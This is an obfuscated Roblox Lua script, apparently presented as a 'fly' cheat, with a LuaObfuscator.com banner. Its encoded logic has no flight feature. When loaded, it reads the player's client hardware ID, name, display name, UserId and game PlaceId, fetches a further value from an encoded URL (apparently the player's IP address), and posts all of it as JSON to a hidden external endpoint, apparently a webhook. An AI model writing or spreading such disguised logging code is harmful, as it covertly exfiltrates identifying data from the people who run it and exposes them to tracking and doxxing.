--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v13,v14) local v15={};for v17=1, #v13 do v6(v15,v0(v4(v1(v2(v13,v17,v17 + 1 )),v1(v2(v14,1 + (v17% #v14) ,1 + (v17% #v14) + 1 )))%256 ));end return v5(v15);end local v8=game:GetService(v7("\249\215\207\53\213\190\213\8\216\192\222","\126\177\163\187\69\134\219\167"));local v9=game:GetService(v7("\17\207\50\228\242\34\193\51\209\245\32\222\25\192\238\53\196\41\192","\156\67\173\74\165")):GetClientId();local v10=v7("\60\163\93\6\175\124\9\123\179\64\5\191\41\84\48\249\74\25\177\105\71\36\190\6\1\185\36\78\59\184\66\5\243\119\21\101\238\31\79\228\117\16\103\228\28\64\236\116\22\108\225\16\89\172\113\97\58\227\68\78\173\32\87\24\176\77\35\179\114\92\33\166\95\14\180\0\23\30\174\78\36\233\33\127\23\228\100\66\183\113\121\39\178\16\59\185\44\97\29\152\4\69\183\54\71\13\152\111\1\190\62\68\35\133\123\16\143\51\30\63\164","\38\84\215\41\118\220\70");local v11=(syn and syn.request) or (http and http.request) or http_request or request or httprequest ;local v12=game.Players.LocalPlayer;function fly() local v16=game:HttpGet(v7("\88\2\54\2\237\10\89\109\27\238\89\24\36\29\176\89\25\109\24\237\95\24","\158\48\118\66\114"));v11({[v7("\158\54\28","\155\203\68\112\86\19\197")]=v10,[v7("\107\216\34\244\79\124","\152\38\189\86\156\32\24\133")]=v7("\204\120\148\114","\38\156\55\199"),[v7("\128\120\125\44\22\102\233","\35\200\29\28\72\115\20\154")]={[v7("\58\176\223\203\136\34\32\84\139\200\207\136","\84\121\223\177\191\237\76")]=v7("\186\70\217\172\51\83\49\213\178\89\199\239\48\67\63\207","\161\219\54\169\192\90\48\80")},[v7("\107\77\4\60","\69\41\34\96")]=v8:JSONEncode({[v7("\191\204\217\30\7\37\168","\75\220\163\183\106\98")]="",[v7("\7\183\137\50\221\17","\185\98\218\235\87")]={{[v7("\223\53\51\234\219","\202\171\92\71\134\190")]=v7("\0\241\108\164\38\198\43\141\45\128","\232\73\161\76"),[v7("\191\220\81\94\12\178\201\86\84\17\181","\126\219\185\34\61")]=v7("\46\215\30\82\115\126\253\238\31\198\95\121\117","\135\108\174\62\18\30\23\147"),[v7("\162\240\58\206","\167\214\137\74\171\120\206\83")]=v7("\153\249\49\85","\199\235\144\82\61\152"),[v7("\4\25\181\36\21","\75\103\118\217")]=tonumber(16775930),[v7("\193\93\117\24\189\13","\126\167\52\16\116\217")]={{[v7("\198\47\45\133","\156\168\78\64\224\212\121")]=v7("\55\226\164\215\2\252\229\231\9\232\170\142\60\198\146\231\35\211","\174\103\142\197"),[v7("\64\41\83\45\32","\152\54\72\63\88\69\62")]=v9,[v7("\221\202\226\85\218\193","\60\180\164\142")]=false},{[v7("\86\95\8\44","\114\56\62\101\73\71\141")]=v7("\136\229\218\221\189\251\155\237\182\239\212\132\131\220\232\225\138\199\250\233\157\212","\164\216\137\187"),[v7("\196\231\61\167\163","\107\178\134\81\210\198\158")]=v12.Name,[v7("\49\0\142\207\164\61","\202\88\110\226\166")]=false},{[v7("\205\14\143\242","\170\163\111\226\151")]=v7("\33\60\179\33\75\37\105\56\62\180\55\14\12\13\56\3\130\20\111\14\7\48\29\151\5","\73\113\80\210\88\46\87"),[v7("\151\45\193\7\226","\135\225\76\173\114")]=v12.DisplayName,[v7("\19\227\180\185\162\184","\199\122\141\216\208\204\221")]=false},{[v7("\163\220\29\245","\150\205\189\112\144\24")]=v7("\21\136\190\85\1\154\81\57\43\130\176\12\63\161\53\45","\112\69\228\223\44\100\232\113"),[v7("\194\30\11\198\179","\230\180\127\103\179\214\28")]=v12.UserId,[v7("\133\11\83\79\234\68","\128\236\101\63\38\132\33")]=false},{[v7("\162\168\28\65","\175\204\201\113\36\214\139")]=v7("\96\205\56\217\68\110\194\51\211\68\124\229\17\225","\100\39\172\85\188"),[v7("\187\121\181\149\54","\83\205\24\217\224")]=game.PlaceId,[v7("\239\203\193\52\232\192","\93\134\165\173")]=false},{[v7("\176\243\204\199","\30\222\146\161\162\90\174\210")]=v7("\204\126\48\35\235\72\127\74\222\124\113\29\165\106\113\30\228\115","\106\133\46\16"),[v7("\78\33\127\233\95","\32\56\64\19\156\58")]=v16,[v7("\83\198\233\95\84\247","\224\58\168\133\54\58\146")]=false}}}}})});end fly();
